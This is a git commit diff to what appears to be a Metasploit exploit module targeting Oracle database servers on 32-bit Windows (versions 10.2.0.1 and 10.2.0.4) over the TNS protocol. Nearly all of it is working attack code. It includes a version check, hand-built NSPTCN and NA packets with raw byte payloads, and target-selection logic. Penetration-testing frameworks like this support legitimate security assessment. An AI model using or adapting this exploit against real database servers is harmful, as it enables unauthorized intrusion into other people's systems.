fixed version command, check function
git-svn-id: file:///home/svn/framework3/trunk@8182 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
e8048704be
commit
97c3159293
|
@ -73,27 +73,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
connect
|
||||
version = "(CONNECT_DATA=(COMMAND=VERSION))"
|
||||
pkt = tns_packet(version)
|
||||
sock.put(pkt)
|
||||
sock.get_once
|
||||
res = sock.get_once(-1, 1)
|
||||
disconnect
|
||||
|
||||
print_status("Oracle version reply: " + res)
|
||||
if (res)
|
||||
return Exploit::CheckCode::Vulnerable if (res =~ /32-bit Windows: Version 10\.2\.0\.1\.0/)
|
||||
return Exploit::CheckCode::Vulnerable if (res =~ /32-bit Windows: Version 10\.2\.0\.4\.0/)
|
||||
version = tns_version
|
||||
if (not version)
|
||||
raise RuntimeError, "Unable to detect version!"
|
||||
end
|
||||
|
||||
print_status("Oracle version reply: " + version)
|
||||
return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/)
|
||||
return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.4\.0/)
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
mytarget = nil
|
||||
if target.name =~ /Automatic/
|
||||
|
@ -121,10 +114,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Attacking using target \"#{mytarget.name}\"")
|
||||
end
|
||||
|
||||
|
||||
username = rand_text_alphanumeric(0x1c)
|
||||
|
||||
connect
|
||||
|
||||
print_status("Sending NSPTCN packet ...")
|
||||
nsptcn_pkt = tns_packet("(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))")
|
||||
connect_data = "" +
|
||||
"(DESCRIPTION=" +
|
||||
"(CONNECT_DATA=" +
|
||||
"(SERVICE_NAME=orcl)" +
|
||||
"(CID=" +
|
||||
"(PROGRAM=client.exe)" +
|
||||
"(HOST=client_host)" +
|
||||
")" +
|
||||
")" +
|
||||
"(ADDRESS=" +
|
||||
"(PROTOCOL=TCP)" +
|
||||
"(PORT=1521)" +
|
||||
")" +
|
||||
")"
|
||||
nsptcn_pkt = tns_packet(connect_data)
|
||||
sock.put(nsptcn_pkt)
|
||||
|
||||
# read NSPTRS
|
||||
|
@ -138,7 +148,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# send NA
|
||||
print_status("Sending NA packet ...")
|
||||
na_stuff = "\xDE\xAD\xBE\xEF\x00\x92" +
|
||||
na_stuff = [0xdeadbeef].pack('N') +
|
||||
"\x00\x92" +
|
||||
"\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00" +
|
||||
"\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71" +
|
||||
"\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00" +
|
||||
|
@ -214,6 +225,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
|
||||
def tns_version
|
||||
connect
|
||||
version = "(CONNECT_DATA=(COMMAND=VERSION))"
|
||||
pkt = tns_packet(version)
|
||||
sock.put(pkt)
|
||||
sock.get_once
|
||||
res = sock.get_once(-1, 1)
|
||||
disconnect
|
||||
return res
|
||||
end
|
||||
|
||||
|
||||
def nsptda_packet(data)
|
||||
pkt = [data.length + 10].pack('n') # NSPHDLEN
|
||||
pkt << [0].pack('n') # NSPHDPSM
|
||||
|
|
Loading…
Reference in New Issue